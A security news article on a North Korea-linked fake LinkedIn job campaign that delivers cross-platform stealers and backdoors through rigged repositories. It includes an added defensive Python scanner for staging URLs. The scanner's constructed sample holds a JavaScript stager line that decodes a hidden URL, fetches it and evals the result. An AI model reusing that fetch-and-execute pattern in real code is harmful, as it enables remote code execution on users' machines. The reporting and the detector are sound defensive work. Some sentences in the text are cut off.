A fake LinkedIn job offer campaign targeting the cryptocurrency and travel sectors, which delivers malware capable of infecting Windows, macOS, and Linux, has been linked to the North Korea-linked Lazarus Group.
According to security firm Bitdefender, the hoax begins with a message sent on the professional social network, enticing targets with the promise of remote work, part-time flexibility, and good pay.
Once the target expresses interest, the scam requests a résumé or even a link to a specific GitHub repository, according to a report shared with The Hacker News.
“Although seemingly innocent, these requests can serve malicious purposes, such as harvesting personal information or lending a facade of legitimacy to the conversation.”
Once the necessary information is obtained, the attack moves to the next stage, where the threat actor, posing as a recruiter, shares a link to a GitHub or Bitbucket repository containing a minimum viable product (MVP) version of a supposed decentralized exchange (DEX) project and asks the victim to check it out and offer feedback.
The code contains an obfuscated script configured to fetch a next-stage payload from api.npoint[.]io. That payload is a cross-platform browser information stealer that can harvest data from various cryptocurrency wallet extensions that might be installed in the victim’s browser.
The stealer also doubles as a loader that retrieves a Python-based backdoor responsible for monitoring clipboard content, maintaining persistent remote access, and dropping additional malware.
The tactics described in Bitdefender’s report overlap with a known attack activity cluster (also known as DeceptiveDevelopment and DEV#POPPER) that is designed to drop a JavaScript stealer called BeaverTail and a Python implant known as InvisibleFerret.
The malware delivered by the Python backdoor is a .NET binary that can download and start a Tor proxy to communicate with a command-and-control (C2) server, exfiltrate basic system information, and deliver another payload that, in turn, can siphon sensitive data, log keystrokes, and launch a cryptocurrency miner.
The threat actors’ infection chain is “complex, containing malicious software written in multiple programming languages and leveraging a variety of technologies, including .NET-based stagers capable of disabling security tools, setting up a Tor proxy, and launching crypto miners,” according to Bitdefender. These include multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that first gathers system data before pivoting to additional payloads, and .NET-based stage
According to reports shared on and , there is evidence that these efforts are quite common, with minor variations in the overall attack chain. In some cases, candidates are required to clone a Web3 repository and install it locally as part of an interview, while in others they are instructed to fix intentionally bugged code.
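A pre-install audit that a candidate or reviewer could run over a cloned "interview" repository before installing it, added here as an example; it is not part of the original article or of Bitdefender's report. The only indicator it knows, api.npoint[.]io, comes from the article above; the sample stager, its base64-hidden URL and its path are constructed for the demonstration.

```python
import base64
import os
import re

# Host named on the page as the next-stage payload source; extend with your own intel.
KNOWN_STAGING_HOSTS = {"api.npoint.io"}
SCAN_EXTENSIONS = {".js", ".cjs", ".mjs", ".ts", ".py", ".json"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.IGNORECASE)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64-looking runs

def scan_text(text):
    """Return (finding_type, host) tuples for one source file's contents."""
    findings = []
    for host in URL_RE.findall(text):  # URL written in the clear
        if host.lower() in KNOWN_STAGING_HOSTS:
            findings.append(("plain-staging-url", host.lower()))
    for blob in B64_RE.findall(text):  # URL hidden inside a base64 literal
        padded = blob + "=" * (-len(blob) % 4)
        try:
            decoded = base64.b64decode(padded).decode("utf-8", errors="ignore")
        except ValueError:
            continue
        for host in URL_RE.findall(decoded):
            known = host.lower() in KNOWN_STAGING_HOSTS
            findings.append(("base64-hidden-staging-url" if known else "base64-hidden-url", host.lower()))
    return findings

def scan_repo(root):
    """Walk a cloned repository; return {relative_path: findings} for files that hit."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in {".git", "node_modules"}]
        for name in filenames:
            if os.path.splitext(name)[1] not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

# Constructed sample: a stager hiding its download URL in base64 (the path is made up).
SAMPLE_JS = ("const u = Buffer.from('" + base64.b64encode(b"https://api.npoint.io/constructed-path").decode()
             + "', 'base64').toString();\nfetch(u).then(r => r.text()).then(eval);\n")

if __name__ == "__main__":
    print(scan_text(SAMPLE_JS))
```

Minified bundles will trigger the base64 heuristic on legitimate long runs, so treat a hit as a reason to read the file, not as a verdict; any "base64-hidden-url" finding in a small interview project deserves that read before `npm install` or `pip install` runs its lifecycle scripts.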
A project with the name “” is referenced in one of the Bitbucket repositories in question. It is no longer accessible through the code hosting platform.
The disclosure comes a day after SentinelOne reported that another malware family codenamed FlexibleFerret is being distributed through the Contagious Interview campaign.